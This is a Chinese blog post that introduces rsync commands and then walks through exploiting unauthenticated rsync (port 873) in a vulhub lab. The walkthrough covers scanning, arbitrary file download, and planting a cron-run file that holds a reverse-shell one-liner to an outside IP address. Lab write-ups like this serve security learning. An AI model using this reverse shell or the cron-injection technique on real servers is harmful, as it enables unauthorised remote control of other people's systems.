rsync

介绍

rsync 是一个用于文件和目录同步的强大工具,常用于在本地或远程主机之间复制和同步文件。它不仅支持局域网内的快速文件传输,还可以通过 SSH 进行远程同步。rsync 的主要特点是增量同步,即只传输发生变化的文件部分,从而提高传输效率

如何rsync配置不当,会造成任何人可以未授权访问上传下载服务器文件。端口873

rsync相关命令

(1)本地文件同步

/path/to/source/ 文件夹同步到 /path/to/destination/ 文件夹:

复制代码
rsync -av /path/to/source/ /path/to/destination/

(2)通过SSH同步文件到远程主机

将本地 /path/to/source/ 同步到远程主机 remote_host/path/to/destination/ 目录:

复制代码
rsync -avz -e ssh /path/to/source/ user@remote_host:/path/to/destination/

(3)从远程主机同步文件到本地

将远程主机 remote_host/path/to/source/ 目录同步到本地 /path/to/destination/

复制代码
rsync -avz -e ssh user@remote_host:/path/to/source/ /path/to/destination/

(4)删除目标中文件没有的内容

同步本地文件夹 /path/to/source//path/to/destination/,并删除目标目录中源目录没有的文件:

复制代码
rsync -av --delete /path/to/source/ /path/to/destination/

环境

vulhub漏洞docker

漏洞利用

进入环境

nmap主机发现

发现是136的主机,进行全端口的扫描

-sT -sV -O 对873端口扫描服务的端口信息(操作系统版本)

nmap脚本扫描是否存在RSYNC的未授权访问(有)

用rsync的命令工具命令读取文件

查看src模块下的文件

进行任意文件的下载

任意文件下载

在攻击机看到已经下载在kali机的目录下了

查看文件的信息

查看定时任务并下载在kali里

查看文件大概是17分钟用一个/etc/cron.hourly

创建一个shell并写入反弹命令(/bin/bash -i >& /dev/tcp/47.100.167.248/1111 0>&1(写在shell文件里面)

查看写入的命令

nc监听

上传shell

如果文章有错请各位大佬指正

相关推荐
2501_9387918316 分钟前
Rust Axum 框架开发后端服务:实现高性能 TCP 连接的处理逻辑
网络·tcp/ip·rust
北极光SD-WAN组网2 小时前
5G智慧网络如何实现异地组网?基于智能组网模块的解决方案解析
网络·5g
刘孬孬沉迷学习2 小时前
5G网络gNB与核心网(5GC)连接架构及传输协议
网络·网络协议·tcp/ip·5g·架构·udp·信息与通信
Xiaok10182 小时前
libpcap 抓包:从打开网卡到解析数据包
服务器·网络·php
爱奥尼欧2 小时前
【Linux笔记】网络部分——传输层协议TCP(1)
linux·运维·网络·笔记·tcp/ip·1024程序员节
lang201509282 小时前
WebSocket子协议STOMP
网络·websocket·网络协议
饺子大魔王的男人2 小时前
3秒传输GB级文件:FastSend让P2P共享告别云存储依赖
网络·网络协议·p2p
一叶知秋yyds4 小时前
openwrt 系统下通过命令行设置允许wan口进行Luci页面的访问
网络·openwrt·luci 开启wan 口访问
网络安全-海哥5 小时前
Web安全深度实战:从漏洞挖掘到安全防护
网络·web安全·网络安全·网络攻击·转行